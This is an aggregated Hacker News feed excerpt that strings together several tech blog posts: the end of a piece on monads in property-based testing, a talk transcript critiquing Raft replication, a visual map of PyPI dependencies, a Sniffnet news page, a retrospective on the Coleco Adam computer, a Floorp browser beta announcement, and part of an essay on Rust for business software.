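    // prop_flat_map: the Index is generated independently, and only
    // resolved against the vector's actual length inside a plain prop_map.
    fn vec_and_element() -> impl Strategy<Value = (Vec<u64>, u64)> {
        (vec(0..10000u64, 1..512), any::<Index>()).prop_map(|(v, idx)| {
            let elem = *idx.get(&v);
            (v, elem)
        })
    }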

    Last but not least, there’s a set of approaches that I’m going to put into the bucket of rediscovering structure across flat maps. Key to these is understanding that when you generate a random value, you’re turning an RNG, which is a random stream of bits, into concrete, structured values. Can we somehow be clever about looking at the RNG bitstream?

    • One option is to instrument the test, for example by using a fuzzer. Fuzzing is all about generating random data, looking at the branches explored, and tweaking the random data to ensure other branches are taken. It’s a great fit for peering past the black box of monadic composition.

    • Another option is to be clever with the random number generator. An RNG ultimately generates a sequence of ones and zeroes. Can we poke at this sequence, possibly with the help of some hints from the strategies themselves? This is implemented by the Hypothesis framework for Python; see this excellent paper about it.

    Both of these approaches are heuristic and quite complex. But that’s what you need to put together some structure again, after it’s been through the blender of monadic composition.

    In this article, we looked at monads as a design pattern: a way for a user to compose operations within a framework. We looked at both monadic functions like prop_flat_map, and non-monadic ones such as prop_map and prop_oneof. Finally, we saw how in the context of property-based testing, monadic composition has a performance impact measured in orders of magnitude.

    With this knowledge in mind, you can now spot monadic composition in all kinds of other places:

    • Async code, where the result of one future.await can determine which futures are spawned next.
    • Build systems, where a build node can dynamically generate more build nodes.
    • Iterators, where flat_map turns individual values into entire iterators.

    The common thread through all of these examples is that within a framework, monadic composition is not just from value to value. It is from value to a further instance of that framework. The return value of future.await can result in more futures being spawned, monadic build nodes can generate more build nodes, and flat_map turns individual values into iterators. This freedom is what makes monads both the most flexible kind of composition, and the hardest to predict the behavior of.

    This is part of a general observation throughout programming, whenever there’s an interaction between two parties or two sides. The more restrictions there are on one side, the freer the other side is to do what it likes. Monadic composition is an extreme version of that: the most powerful and least constrained form of composition for the user, but the most difficult to deal with for the framework.

    Whether you’re a user or a library designer, pay close attention to situations where your operations are monadic. They can provide a great deal of power, perhaps too much in some circumstances. If non-monadic operations are sufficient to help you achieve your goal, prefer them.

    Thanks to Fiona and Cliff Biffle for reviewing drafts of this post. Any mistakes in it are my own.

    Updated 2025-02-20: Clarified note about Turing completeness to indicate that it is not the composition itself that’s Turing-complete—it’s the language used to write the callback in that’s at issue.

    This section contains some jargon, but it’s mostly here to satisfy the pedants who will inevitably Ctrl-F for “monad laws”. Please ignore this section if you didn’t get here through a search for that string.

    ]]>
    https://sunshowers.io/posts/monads-through-pbt/ hacker-news-small-sites-43218499 Sat, 01 Mar 2025 12:12:03 GMT
    <![CDATA[Enough with All the Raft]]> thread link) | @vrnvu
    March 1, 2025 | https://transactional.blog/talk/enough-with-all-the-raft | archive.org


    This talk is an extension of my earlier Data Replication Design Spectrum blog post. The blog post was the analysis of the various replication algorithms, which concludes with showing that Raft has no particular advantage along any easy analyze/theoretical dimension. This builds on that argument to try and persuade you out of using Raft and to supply suggestions on how to work around the downsides of quorum-based or reconfiguration-based replication which makes people shy away from them.

    Video

    Transcript

    slide 1

    Hi folks. I’m here to try and convince you to consider options other than Raft.


    slide 2

    Raft (or just leadered consensus in general; I’m using the two interchangeably in this talk) has emphatically won both on actual usage in databases by my somewhat haphazard survey…


    slide 3

    And even more subjectively it’s won by mindshare. Any discussion I see of replication is always about raft. (and this is edited, throughout this whole talk, I’m not trying to subtweet any one person/project/whatever) But it’s always Raft. Or multi-paxos. Or that viewstamped replication should be the one true replication algorithm. And this grates on me, because if you’re choosing between three options, those aren’t even the right three to be considering.


    slide 4

    I claim there’s three classes of replication algorithms[1]: Quorums, Reconfiguration, and leadered consensus as a hybrid of the two, and that all replication algorithms can be placed along a single axis which classifies them based upon how they handle failures. With quorums, the loss of any member of the replication group can be tolerated, and replication continues on. Think Cassandra. With reconfiguration, the write-all-read-one replication halts on a failure, and continues once the failed node has been automatically replaced. Historically, this is like MySQL with failover. And finally our overused Raft exists as a hybrid of the two: the followers act like quorum replication, but having a leader bumps it one tick towards reconfiguration. [1]: This is the one slide summary of what Data Replication Design Spectrum tries to pitch in terms of classification.


    slide 5

    And so this talk is framed as trying to argue my hypothetical arch-nemesis out of their mental model here: that Raft is the absolute best and always the correct default option, and anything else should only be used begrudgingly in some very specific cases. I’m actually trying to get to the argument of: please just use the best-suited replication algorithm, but that’s going to involve some Raft bashing while sprinkling in advice on how to succeed in a non-Raft world.

    So let’s get started.


    slide 6

    We’re going to first tackle the broad argument that Raft is just uniformly superior. And if you tell me it’s best, I want to know: it’s best at… what?


    slide 7

    If it’s the best at something, I should be able to sit down, and do the math of how it acts along some dimensions versus the alternatives, and show, inarguably, that raft delivers better something than the alternatives. But I’ve done that math. I have a blog post which calculates Quorums, Raft, and Reconfiguration along these dimensions, with every notable variant or proposed raft optimization factored in.


    slide 8

    And that post shows: Raft isn’t better. In every category, it’s at best tied, and at worst, it’s the worst. Most distributed database deployments I’ve worked with have been storage bound, and that 40% higher storage efficiency for reconfiguration can mean a lot of money. Or if you care about availability, on paper, leaderless Paxos gives you better tail latencies with less availability blips than Raft. So the math isn’t justifying Raft’s absurd popularity.


    slide 9

    There’s also this draw to Raft that it’s great because of its simplicity. It’s simpler than Multi-Paxos, for sure, it did a great job at that.


    slide 10

    But in the broader picture, Raft isn’t simpler. Quorums have different replicas with different states and different orders of operations, causing an explosion of states to check for correctness. But once you’ve handled that, all distributed systems problems of slowness, failures, partitions, what-have-you all look the same.

    Reconfiguration is the opposite. I’ve worked on FoundationDB, a very reconfiguration-based database, and whenever some code sends an RPC, either it gets a reply or everyone gets killed and the system resets. All the code is happy-path only, as all failures get pushed through one reconfiguration process. It’s beautifully simple. But gray failures are hard, and having to precisely answer “is this other replica sufficiently alive?” is the challenge that Reconfiguration gains instead.

    And Raft is both of these things, so not only do you have to have a well-integrated failure detector for the leader, but you also have a tremendous state space to search in which bugs could be hiding from the quorum of followers. It’s not simpler.


    slide 11

    One could argue "Raft is better than Reconfiguration because Reconfiguration has unavailability!"

    This is the reconfiguration counter-argument I have encountered the most often, and this is my least favorite argument, because it’s like a matryoshka of misunderstandings.


    slide 12

    First, If you’re so upset about unavailability, what happens when the leader dies in raft? Request processing halts, there’s a timeout, a reconfiguration process (leader election), and requests resume.


    slide 13

    What happens when you use reconfiguration and a replica dies? Request processing halts, there’s a timeout, a reconfiguration process, and requests resume. It’s literally the same diagram. I just deleted some nodes. If you’re upset about this slide, you have to be equally upset about the last slide too.


    slide 14

    Furthermore, if we’re talking about replicating partitions of data, then leadership gets distributed across every machine to balance resource usage, as leaders do more work. So when a machine fails, some percentage of your data is going to be "unavailable"; we’re only arguing about exactly what that percent is. So, no.


    slide 15

    Furthermore, it’s an argument based out of a bad definition of the word availability. Unavailability is when requests have latency above a given threshold. If the reconfiguration process happens within your latency threshold, it’s not unavailability.


    slide 16

    The Huawei Taurus paper has an argument for reconfiguration-based replication in this vein, which is a bold argument and I love it.


    slide 17

    They’re building replication for a write ahead log, and are making a case here about their write availability for appending a new log segment.

    They say:

    • We can identify a failure quickly.

    • Our reconfiguration process is fast.

    • The chance of us being unable to find 3 new working nodes is effectively 0.

    • Therefore our change of being unavailable is effectively 0%.

    And that’s the correct way to look at availability. You can hate this argument, you can still poke some minor holes in it, but they’re not wrong.


    slide 18

    There is a correct counter-argument here, and it’s that you cannot solve consensus with two failures using three nodes. So when raft is electing a new leader or changing its replicas, it can do that itself. Reconfiguration-based replication needs some external consensus service to lean on. But the options of what you can use for that are ever more plentiful. With S3 supporting compare-and-swap now, you can even use S3 as your consensus service. But this is a design requirement difference from Raft.


    slide 19

    For concrete advice on how to build systems using an external consensus service to manage membership, the PacificA paper gives a very nice description of how to do this, and how to manage an automatic failover and reconfiguration process safely. It has already been directly adopted by Elasticsearch, and Kafka’s replication is very similar in spirit.


    slide 20

    Moving onto the Quorums side, one could argue "Raft is better than Quorums because Quorums livelock on contention!"

    Simple majority quorums doesn’t livelock, so we’re talking about leaderless consensus here only, and this is a known concern. But there’s ways to minimize or work around this issue.[2] [2]: Unmentioned in this talk is "just put the replicas closer together", like Tencent’s PaxosStore, because that’s not as general of advice.


    slide 21

    First, don’t keep the raft mental model that operations need to go into a log, and all operations need to go into one log. Target your operations to the specific entity or entities that you’re modifying, so that you contend only on what you actually need to.


    slide 22

    You don’t even need to materialize a log if you don’t need a log. Compare-and-Swap Paxos just models evolving your entity from one state to the new state, with no “put things into a log” step in-between. And it’s a great example of being simpler than Raft — Denis’s example implementation with membership changes is 500 lines of code.

    If you’re looking for a weekend "implement consensus" project, this is what I’d recommend doing.


    slide 23

    Second, and this is the trick I see applied the least often, but remember that even when modifying the same entity, you don’t need to have all replicas agree on an ordering for commutative operations — those which yield the same result regardless of what order they’re performed in. Increments are the easiest example. Every replica agrees that at the end it’s a net plus six here, and this is safe to do as long as no one sees an intermediate result.


    slide 24

    Permitting commutative operations to commit concurrently while banning reads requires cooperation from your concurrency control layer too. You can read about increment locks in database textbooks, but escrow transactions is the most fun. If I try to deposit $100 and withdraw $100 from my bank account, those might be commutative operations. If I have zero dollars, it matters if the withdrawal gets ordered before the deposit. If I’m a billionaire, it doesn’t matter. Escrow Transactions pitches how to handle even these sorts of "conditionally commutative" situations so that you can get your contention down as low as possible.


    slide 25

    Lastly, the livelock stems from inconsistent ordering of requests across replicas, and you can also take a dependency on physical clocks to help consistently order requests instead. There’s an E-Paxos Revisited[3] paper which gives a focused pitch on this idea as well, but I’d strongly suggest checking out Accord, Cassandra’s new strictly serializable transaction protocol, that’s an industry implementation of leaderless consensus, and avoiding livelock by leaning on a physical time based ordering. [3]: E-Paxos is the classic example of targeting only the entities one wishes to modify within paxos, but there’s aspects of it which haven’t been fully scoped out for real-world implementation. Most of these are centered around that E-Paxos maintains a DAG of operations (where edges are conflicts) which makes a number of aspects of a real system (e.g. replica catchup or garbage collection) significantly harder to do efficiently. I only know of Cassandra having an implementation of it which was never merged, and they ended up going towards extending E-Paxos into Accord instead.


    slide 26

    So to wrap this up: I’m not here to pitch you that Raft never has a use. Going through these arguments was to show that there are limitations to Quorums and Reconfiguration, and to talk about how you can best work around those limitations. But each side has a critical flaw, and the one advantage that Raft uniquely has is its unrelenting, unwavering mediocrity. It is less efficient, it is less “available”, and it is more complicated, but there’s no situation in which Raft isn’t an “okay” solution. It’s a safe choice. But, broadly, categorically, and littered with minor factual issues, not using Raft gets you a system that’s better at something.


    slide 27

    So the mental model I’d like to leave you with is:

    • Use Quorums or Raft if you can’t have any other supporting service to help with group membership.

    • Use Reconfiguration or Raft if you must handle high, single-item contention.

    If you need both of these things, then you might have to use Raft. But using Raft is your punishment. You’re forced to use a resource-inefficient, complex solution, because your design constraints left you with no wiggle room.


    slide 28

    Please use the replication algorithm that best fits your use case. It’s possible that that’s Raft. That’s fine. But reconfiguration is 40% cheaper by instance count than Raft. If I go to your database’s users and ask if they’re fine with slightly higher tail latency in exchange for 40% off their hardware cost, how many are going to say no? Or, if tail latency really is that important to them, would they not be happier with Quorums? Use what fits your users' needs the best.


    slide 29

    If you’re interested in some further food for thought here, disaggregated OLTP systems make a really interesting replication case study. Each of the major vendors chose a completely different replication solution, so if you read through the series of papers you see what effects those choices had, and get to read the criticisms that the later papers made of the earlier ones' decisions.


    ]]>
    https://transactional.blog/talk/enough-with-all-the-raft hacker-news-small-sites-43218379 Sat, 01 Mar 2025 11:51:09 GMT
    <![CDATA[A Map of Python]]> thread link) | @fi-le
    March 1, 2025 | https://fi-le.net/pypi/ | archive.org

    PyPi, the Python Software Foundation's package repo, counts over half a million open source projects. Since I use many of these every day, it seemed appropriate to get to know this set of packages better, and show some appreciation. The index website provides nice search and filtering, which is good when looking for something specific. Here though, we want to take a look at every package at once, to construct a visualization, and perhaps even discover some cool new packages.

    To visualize the set, then, we need to find out its structure. Luckily PyPi provides a nice JSON API (see here for numpy's entry for instance) and even luckier, there is a copy on BigQuery so that we don't have to bother the poor PyPi servers with >600,000 requests.

    One SQL query later, we have a .jsonl of all the metadata we want. So what metadata do we want? Since we want to uncover the internal structure of the dataset, we focus on the defining feature of open source and look at the dependencies of each package. This gives a natural directed graph topology. For once, dependency hell is actually helpful!

    Half a million nodes is a lot for an interactive graph - good motivation to look at the data more closely. Like all big datasets, the BigQuery mirror is messy, containing many not-so-classic Python packages like "the-sims-freeplay-hack", "cda-shuju-fenxishi-202209-202302" and other collateral. These seem to have been detected and taken down by PyPi, because they don't have a package website. To get down to a reasonably sized dataset, we therefore filter for packages where some important columns aren't null. This gets us down to around 100,000, so we somewhat arbitrarily filter for packages with more than 2 dependencies (and let them fill us in on the packages that they depend upon) for a smaller test dataset. We use all dependencies, including experimental, development and testing ones.

    Graph layouts are a classic computer science problem, and we can use handy software designed exactly for this kind of task, like Gephi. This lets us use an algorithm of our choice, and after playing around with a few, I find that the default Force Atlas 2, an iterative spring-energy minimization, does the best job. This was expected! (This amazing talk by Daniel Spielman will convince you to love force-directed graph layouts, if you don't yet.)

    Here is the interactive graph:

    I would have expected a very tightly knit cloud centering around the most common packages as the result, with little clustering. This is more or less what happens - two dimensions are just not enough to capture the neighborhoods of a highly connected graph. The mean degree is 4.97. But that is not the whole story.

    We obtain clusters of packages that depend on the same set of packages. Some are innocent: only depending on numpy, for example, is a very good thing; in fact I wish that cluster was bigger. Another cluster, though, contains only packages depending on "peppercorn", "check-manifest" and "coverage". In there, we find packages with names like "among-us-always-imposter-hack". Good job passing the previous filter, I suppose! These are copied from a template Python package called pqc, and were uploaded uninitialized. Those with obviously spammy names are taken down, but some weird ones remain. A subcluster of 10 packages named variations of "python-smshub-org" has sat in there since an upload in May 2019. As far as I can tell, no currently online packages contain malicious code, but I feel this is a proof of concept that graph drawing can find anomalies. Neat!

    Some organizations generate a lot of Python packages. An enterprise software miscellanea company called Triton, for instance, puts out over 300 packages with its name in them. They all depend on the same base package and are thus visualized close together. Perhaps the biggest one is another enterprise software company, Odoo, whose main package has over 3000 child packages. Similar groupings include a data pipeline company called Airbyte with 320 packages, the Objective-C bridge PyObjC with 167 packages and the content management system Plone. A corporate API client called aiobotocore apparently uses 421 packages only for its types.

    The energy-based layout also finds recognizable semantic neighborhoods. Some I know better, such as north of numpy, where scikit-learn, seaborn and tensorflow are hanging out. Others less, like the region around cryptography. This is already a nice way to window shop some packages, but I am very sure that this only scratches the surface of this dataset. Some further steps would be to visualize recursive dependency trees nicely, improve performance, and add search. Next up: Rust crates, CRAN, Hackage?

    For replicating this, see the accompanying repository.

    ]]>
    https://fi-le.net/pypi/ hacker-news-small-sites-43218343 Sat, 01 Mar 2025 11:44:18 GMT
    <![CDATA[Sniffnet now has an official Blog]]> thread link) | @GyulyVGC
    March 1, 2025 | https://sniffnet.net/news/ | archive.org

    Follow Sniffnet to receive the latest project news and updates.

  • Sniffnet official merchandise released!

    February 17, 2025

    Sniffnet merch is finally real 🎉 A couple weeks ago Sniffnet reached the remarkable milestone of 20k stars on GitHub — to celebrate we’re dropping brand new apparel today! Such an awesome logo had to be featured on physical goods sooner or later 🕵️‍♂️ [Read More]

  • Sniffnet will be supported by the Next Generation Internet program

    October 14, 2024

    It’s such a joy for me to announce that Sniffnet was elected to receive funding from NLnet. The NLnet Foundation supports organizations and people who contribute to an open internet for all. It funds projects that help fix the internet through open hardware, open software, open standards, open science and... [Read More]

  • Sniffnet v1.3: thumbnail mode, PCAP export, and more

    April 8, 2024

    After some months without new major releases, I’m happy to announce that Sniffnet v1.3 is finally out! 🎉 This release introduces several long requested features, such as export of PCAP files, support for ICMP, detection of more upper layer services, and other functionalities to improve the overall user experience, such... [Read More]

    ]]>
    https://sniffnet.net/news/ hacker-news-small-sites-43218342 Sat, 01 Mar 2025 11:43:20 GMT
    <![CDATA[The Coleco Adam: An 8-Bit Personal Computer Failure]]> thread link) | @rbanffy
    March 1, 2025 | https://www.goto10retro.com/p/the-coleco-adam-an-8-bit-personal | archive.org

    The Coleco Adam was a personal computer (really, a home computer) system released by Coleco in 1983. Before we dive into it in more detail, let’s take a quick look at the nascent personal computer and game console market leading up to then.

    The 8-bit personal computer industry started in 1977 with the “trinity” of computers that were released that year: Apple II, TRS-80 and Commodore PET. Also released in 1977 was the Atari VCS game console.

    In 1979, Apple introduced the enhanced Apple II+ and Atari introduced their 400 and 800 computers.

    In 1982, Commodore released the C64 and Coleco released the ColecoVision game console. Both of these would prove to be rather popular, which is a major understatement when talking about the C64.

    The ColecoVision took on the Atari 2600 (formerly the VCS) and the Atari 5200. The 2600 had weak graphics and poor arcade ports, while the 5200 failed pretty quickly. The ColecoVision, with its much better graphics and arcade ports, was a bigger success, as the better quality games made it worthwhile for more serious gamers.

    As was somewhat common at the time, video game makers would try to find a way to promote their game consoles as a computer. There were products for the Atari 2600 that would add a keyboard and BASIC. The Intellivision was initially announced with an extra module that could convert it to a computer, although it never really shipped. The thinking at the time was: get people (kids) hooked on a low-cost game console and they’ll spend a bit more to turn it into an actual computer.

    Although none of those video game console to computer products were well-received, Coleco decided to try it again in 1983 with the Coleco Adam, although they would take the different approach of creating an entire system.

    Coleco Advert: Meet Adam: the Colecovision family computer system, from Electronic Games, December 1983

    At the summer 1983 Consumer Electronics Show, Coleco announced the Adam home computer system at a price of about $500 (about $1600 in 2025). This was an impressive price at that time, because in 1983, to get a full home computer system you would have to buy each component separately. You’d need the computer, of course, but also a disk drive and a printer. Each of those would cost about $300 (about $950 in 2025), so you were looking at $900 for a full system (about $2800 in 2025). That’s an approximate price for an Atari system; a C64 system would likely have been a bit less, an Apple II system much more.

    DAVES OLD COMPUTERS - COLECO ADAM

    The Adam system came with the primary 64K computer1 (a Zilog Z80 running at a rather speedy 3.5 MHz, at least for an 8-bit computer), an integrated high-speed tape drive, SmartBASIC, SmartWriter, the Buck Rogers game and a daisy-wheel printer. The Adam had a nice design with a detachable keyboard, something not available with the Apple, Atari or Commodore. The tape drive was claimed to be as fast as or faster than a floppy drive, which would certainly have been true compared with the glacially slow Commodore 1541 drive, but not likely faster than either the Atari or Apple floppy drives.

    Printers were often hard to hook up and configure, so having one included was a real convenience. Of course, a printer was also not really a requirement, especially if you mostly played games, so some could eliminate it from the cost comparison.

    On paper, this all sounded pretty good. It would greatly simplify the purchase of a complete home computer system. You would get everything all at once, in one box! Although you’d probably need a big station wagon to get it home!

    There was also a version of the Adam called the ColecoVision Expansion Module #3. It cost slightly less because it plugged into the ColecoVision itself to use some of its hardware.

    This thing was big. Needs a banana for scale.

    Unfortunately, when this shipped in late 1983, the price had increased to about $700 (about $2200 in 2025), making it a much worse deal. It was also plagued with availability and reliability problems2.

    Perhaps its biggest issue was that printer. As a daisy-wheel printer, it worked like a typewriter, with a wheel of characters that would flip out one at a time, like the petals of a daisy, and get imprinted on the page. However, it had several big problems: it was rather large, noisy, slow and unreliable. Worse, the printer provided power to the entire system, so if you had a problem with your printer, nothing worked.

    The Adam also took up an enormous amount of desk space. The computer was separate from the keyboard, unusual for home computers at the time, and that printer was again monstrous. Plus, you’d still need a monitor (or small TV) of some kind. Because everything took up so much space, you could not easily just use this with the family TV, for example. It really needed its own dedicated space.

    The high-speed tape drive was an interesting idea intended to circumvent the high cost of disk drives, which could run as much as $300 all by themselves in 1983. However, no tape drive is going to be as fast or as useful as a floppy drive, and although this one was fast, it wasn’t fast enough. Spinning a tape at high speed is also noisy, and the drives proved unreliable too. There was another big problem with the Adam: it emitted an electromagnetic pulse when powered on, which could corrupt or even erase the contents of a tape left in the drive.

    Coleco did ship a floppy drive for the Adam, but that was an extra cost and was likely rather rare.

    At the time, the Adam was positively received by the press. I remember that Compute! especially loved it and wrote about it a lot, although they did warn about reliability issues. They even started including BASIC listings for the ColecoVision, something that Family Computing also started doing.

    Unlike other computers of the era, the Adam did not boot into BASIC. Instead it booted into the SmartWriter word processor. To use BASIC, you had to insert the SmartBASIC tape and wait for it to load. The BASIC itself was nice enough and fairly compatible with AppleSoft BASIC on the Apple II.

    Although the Adam could play any ColecoVision game, there was little specific software made for the Adam, which certainly hurt its appeal as an actual computer.

    There were many fun commercials that tried to claim the Adam was the best thing ever, though!

    Due to the poor reliability, many Adam systems were returned as defective. It was rumored that the return rate was over 75% for some of the early systems. Coleco ended up losing a lot of money on the Adam, and by the end of 1984 the writing was on the wall.

    The Adam was discontinued in January 1985, giving it a lifespan of about 14 months. The demise of the Adam also took down the ColecoVision itself, which was discontinued later in 1985 as Coleco got out of the video game and computer market entirely due to big losses. Coleco eventually filed for bankruptcy in 1988, and some consider the Adam/ColecoVision at least partially responsible.

    It is estimated that about 300,000 or so Adam computers were sold.

    I owned a Coleco Adam in the early 1990s for a hot second. I picked it up cheap at a flea market, and I remember that it came in an absolutely gigantic box that barely fit in my car! I really don’t recall what I did with it, other than set it up to make sure it all worked. I never had space for it in my small apartment at the time, so I definitely got rid of it, but I’m not sure how or where. I was selling things on Usenet auctions at the time, but shipping this would have been insanely expensive, so I don’t feel like that would have been viable, even though it feels like the most likely scenario.

    Last summer I went to FunSpot, a giant arcade and also a bit of a vintage museum, and they had a Coleco display with an Adam.

    The full Coleco display with ColecoVision and Adam.
    Here is a closeup of the Adam with the rare floppy drive.

    Today I do see Adams for sale on Facebook Marketplace from time to time. I do get tempted each time I see one, as there are SD card products available today that would make using the tapes unnecessary. The Brewing Academy even has a Fujinet and RAM expansion!

    Looking at Facebook Marketplace now, I see that someone near me has the ColecoVision Expansion Module #3 for sale at just $140!

    Editor: No, Paul, no.

    Product photo of Colecovision expansion module 3 in box
    With the ColecoVision plugged into the back, this thing takes up even more space!

    But for me, as unique and cool as it might be, the Adam just takes up far too much space and I can’t justify getting one.

    Do you remember the Adam? Did you have one? What did you think of it?

    Leave a comment

    ]]>
    https://www.goto10retro.com/p/the-coleco-adam-an-8-bit-personal hacker-news-small-sites-43218126 Sat, 01 Mar 2025 11:05:47 GMT
    <![CDATA[First Look at the v12 of Floorp (a new Firefox based browser from Japan)]]> thread link) | @akvadrako
    March 1, 2025 | https://blog.ablaze.one/4683/2025-02-20/ | archive.org

    *The Mac version is coming soon. Currently, it is only available on Linux and Windows.

    We’re excited to announce that the Floorp v12 beta version is now live!

    After months of development and testing, it’s your turn to explore the new features. Join our Floorp v12 beta phase, share feedback, and help us improve the final version. Read on to learn more and get started!


    🚨 Before you install Floorp v12 beta 🚨

    Floorp v12 can be installed on the same environment as Floorp v11, but please make sure to back up your profile from v11 before attempting the installation. Especially for the workspace feature, there is no compatibility due to changes in the configuration⚠️.

    🔗 How to back up your profile:
    Check here for instructions

    🔗 For recovering important data from an old profile:
    Click here for more details


    ✨ What’s New in Floorp v12?

    🔧 Revamped Floorp Settings

    The new Floorp v12 now features a separated settings page to prevent confusion with Firefox’s built-in settings. This makes it easier to use Floorp’s unique features while reducing the risk of mixing them up with Firefox functions. The new modern design also looks pretty cool, and we will continue improving it in future updates!

    🚀 Rapid Release Tracking

    As previously announced, starting with Floorp v12, we are adopting Rapid Release Firefox as our base for the first time since Floorp v8! This means you can enjoy the latest Firefox features while experiencing all the new innovations from Floorp.

    🖥️ Refined Workspaces & Sidebar

    The Browser Manager Sidebar has been renamed to the “Panel Sidebar”, and it now features a floating mode for more flexibility. Additionally, workspaces are now shared across windows, making multitasking even smoother.

    ⚠️ Note: Workspace management and adding panel sidebars via the dialog are still under development and will become available in future updates.


    🛠️ About the Artifact Build

    This version also introduces “Artifact Build”, a new technology that significantly reduces release time to just a few minutes⏱️✨.

    However, as a result, even in the BETA version of Floorp v12, the application icons on Windows and Mac remain the same as the regular version. We apologize for any confusion this may cause🙏.


    🙏 Special Thanks

    We would like to extend our deepest gratitude to @NyanRus for co-creating Noraneko, the testbed browser that laid the foundation for Floorp v12 BETA. Additionally, we express our appreciation to Mozilla for developing Firefox, the origin of all these features.


    ⬇️ Try Floorp v12 BETA now!

    ➡️ Download Floorp v12 BETA

    ]]>
    https://blog.ablaze.one/4683/2025-02-20/ hacker-news-small-sites-43218012 Sat, 01 Mar 2025 10:42:17 GMT
    <![CDATA[Is Rust a good fit for business apps?]]> thread link) | @todsacerdoti
    March 1, 2025 | https://www.bartoszsypytkowski.com/is-rust-a-good-fit-for-business-apps/ | archive.org

    While you may hear a lot of harsh words about Rust in this rant, that doesn't have to mean it's a bad language. Rephrasing the classic: there are two types of programming languages: ones that people complain about and ones that nobody uses. I started my journey with Rust in 2018 and I've been working in it full time since 2021.

    I love Rust a lot for many things: good std lib abstractions, ergonomics (to some extent), the best build toolchain in the world (I've tried many things, but cargo is easily number one across the programming languages landscape). But mostly I love how it brought sanity into systems programming and gave a viable alternative to this hollow abomination called C++ (and CMAKE).

    But what do I mean by the term business apps? Nowadays, it's all sorts of services targeting various kinds of user/asset management, be it a bank portal, an online shop or any other sort of ERP system. This also covers ETL to a huge extent, as those workloads pull your focus away from the main concerns that Rust shines in.

    These systems usually have a similar shell: a web service providing some API, a database to manage system information, and all sorts of other service connectors.

    These systems are characteristic because their main complexity comes from the domain: it is not hardware/software related, but rather about modelling the complexities of human interactions in code. Quite often the most performance-sensitive parts relate to I/O access (databases, HTTP communication) and serialization, and are solved by tuning access to the other services we use, not the algorithms we write ourselves.

    These systems were famously written in many different languages, from Python/Ruby/JavaScript/PHP to Java/C#/Go. The question is: are business apps a good use case for Rust?

    Spoilers: in my opinion, No. Now let's explain why.

    Standard library

    One of the nice things about Rust is that the abstractions defined in its standard library feel right in size and scope. On the other hand, the std lib itself is woefully lacking: no RNG, cryptography or serialization. Even some things that should have been language features since day one - like async traits and yield generators - are supplied as 3rd-party macros.

    On the other hand, the Rust package ecosystem is enormous. You have everything, from a universal abstraction over file systems with dozens of services supported, down to a cross-platform Bluetooth driver that you can use to (literally) connect to your butt plug.

    While languages such as Go enable you to write pretty much an entire HTTP service from the standard lib alone, this bazaar-style package management comes with a burden: whenever you need to solve any mundane problem, you land in a space where everything has at least 7 different crates available, but half of them are actually toy projects and most of them have not been maintained for the last 5 years. And don't get me started on the audits needed to check that one of the 600 dependencies of your hello-world app won't be used for supply chain attacks.

    It takes time and attention to sift the wheat from the chaff. Attention that is limited and could be put to better use elsewhere.

    And while many of these concerns make sense in systems programming, since they cover very different environments with very slim-tailored constraints - like WASM in the browser, or embedded devices where even Rust's minimal standard lib is too much - they don't matter so much in the context of business apps, where solid defaults for common problems are desired: which is one of the reasons for Go and .NET popularity in this domain.

    Not abstract enough

    One of the fantastic parts of Rust is that it managed to - mostly - live up to the credo of zero-cost abstractions: a situation where the performance of your highly abstracted code (i.e. iterator ops or futures) is basically the same as its hand-rolled equivalent.

    The problem is that Rust comes with some new concepts like lifetimes and mutability modifiers, that cannot be properly abstracted to the same degree as regular generics.

    If you've played with Rust, you've probably already seen those different kinds of iterators for mutable/immutable references, which basically have the same implementation but require twice the boilerplate code. The reason why is that mutability is not a generic property in Rust and cannot be abstracted over.
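    A minimal sketch of what that duplication looks like in practice (my own toy container, not std code): the two iterator types are identical except for `&` versus `&mut`, and there is no way to write the body once:

    struct Pair<T> { a: T, b: T }

    struct Iter<'a, T> { pair: &'a Pair<T>, idx: u8 }
    struct IterMut<'a, T> { pair: &'a mut Pair<T>, idx: u8 }

    impl<'a, T> Iterator for Iter<'a, T> {
        type Item = &'a T;
        fn next(&mut self) -> Option<&'a T> {
            self.idx += 1;
            match self.idx {
                1 => Some(&self.pair.a),
                2 => Some(&self.pair.b),
                _ => None,
            }
        }
    }

    // IterMut::next repeats the exact same logic with `&mut` sprinkled in,
    // and even needs unsafe (or a helper crate) to convince the borrow
    // checker that the mutable borrows it hands out never overlap.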

    Some languages like Pony offer the ability to control read/write access to fields and variables, but do it in a way that enables safe "casting" between them. PS: I highly recommend learning Pony for its reference capabilities concept alone, which may initially seem more complex than Rust's mutability and borrow checker, but in practice is much more robust and avoids many pitfalls that Rust has, especially in multi-threaded programming.

    Dynamic trait references

    Since this rant has already come to the topic of abstractions, let's talk about dyn Trait. First, let me praise Rust's decision to explicitly mark, in code, the references responsible for virtual-table dispatch.

    However Rust also decided to turn Box<dyn Trait>/Arc<dyn Trait> into fat pointers (similar to Go, and opposite to Java/.NET).

    Short explanation: unlike Box<T>, which is basically a memory pointer, the memory representation of Box<dyn T> is two pointers - one for the type's virtual table, and one for the heap address where the corresponding object lives (see the sketch after this list). This comes with a few consequences:

    • If you're working with the C foreign function interface, there's no right C primitive to support you. You need to roll out something of your own, which most likely won't be compatible with existing solutions. A bizarre design decision, given how important native interop is for Rust.
    • If you want to introduce lock-free mutability via a Compare-And-Swap API (like the one that arc-swap offers) and use dynamics at the same time... well, get fucked. You'll need an extra layer of indirection, since this API is only available for pointer-sized things.
    • Some of the Rust APIs restrict you to working over Sized data - types whose size can be determined at compile time - which unfortunately puts limitations on your generic params, e.g. if you ever want to use them in a Box<T> context (since the box pointer will have a different size depending on what T is).
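    A quick demonstration of the fat-pointer layout described above (a standalone sketch, assuming nothing beyond std): a boxed trait object is two machine words, while a plain Box is one:

    use std::mem::size_of;

    trait Speak { fn speak(&self) -> &'static str; }

    struct Dog;
    impl Speak for Dog { fn speak(&self) -> &'static str { "woof" } }

    fn main() {
        let dog: Box<dyn Speak> = Box::new(Dog); // data pointer + vtable pointer
        assert_eq!(size_of::<Box<Dog>>(), size_of::<usize>());
        assert_eq!(size_of::<Box<dyn Speak>>(), 2 * size_of::<usize>());
        println!("{}: thin = {}, fat = {}", dog.speak(),
                 size_of::<Box<Dog>>(), size_of::<Box<dyn Speak>>());
    }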

    Rust provides a workaround in the form of dedicated crates that offer thin dynamic pointers as well, but since they are not part of the standard lib, it's unlikely that you'll be able to use them across different libraries in the ecosystem without extra work.

    Borrow checker: early adopter syndrome

    One of the biggest value proposals of Rust is the borrow checker. If you've ever thought about reasons to learn Rust: the borrow checker and ownership model are the one. They change the way you think about object graphs.

